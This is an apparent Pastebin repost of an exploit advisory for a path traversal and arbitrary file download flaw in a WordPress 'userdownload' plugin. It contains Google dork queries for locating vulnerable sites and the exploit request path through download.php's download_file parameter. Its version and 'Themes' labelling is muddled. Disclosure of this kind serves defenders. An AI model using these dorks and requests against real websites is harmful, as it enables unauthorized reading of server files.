API tools faq
paste
KingSkrupellos

WordPress 5.1.1 UserDownload Themes Arbitrary File Download

KingSkrupellos
Mar 18th, 2019
67
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.51 KB | None | 0 0
raw download clone embed print report
  1. ############################################################################################
  2.  
  3. # Exploit Title : WordPress 5.1.1 UserDownload Themes Arbitrary File Download
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 18/03/2019
  7. # Vendor Homepages : thedesignmill.com.au - jessebirch.com.au - ontopseo.com.au
  8. # Software Information Link : jessebirch.com.au/website-design.html
  9. ontopseo.com.au/about-us/
  10. # Software Affected Version : 5.1.1
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:"/wp-content/plugins/userdownload/"
  15. intext:SEO Services by ONTOP SEO
  16. intext:Website design by Jesse Birch Design & Illustration
  17. # Vulnerability Type :
  18. CWE-200 [ Information Exposure ]
  19. CWE-23 [ Relative Path Traversal ]
  20. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  21. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  22. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  23.  
  24. ############################################################################################
  25.  
  26. # Impact :
  27. ***********
  28. * WordPress 5.1.1 UserDownload Themes is prone to a vulnerability that lets attackers download arbitrary files because the application
  29.  
  30. fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the
  31.  
  32. web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure
  33.  
  34. of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal
  35.  
  36. vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not
  37.  
  38. properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
  39.  
  40. ############################################################################################
  41.  
  42. # Vulnerable File :
  43. ****************
  44. /download.php
  45.  
  46. # Vulnerable Parameter :
  47. **********************
  48. ?download_file=
  49.  
  50. # Arbitrary File Download Exploit :
  51. *******************************
  52. /wp-content/plugins/userdownload/download.php?download_file=[FILENAME]
  53.  
  54. ############################################################################################
  55.  
  56. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  57.  
  58. ############################################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!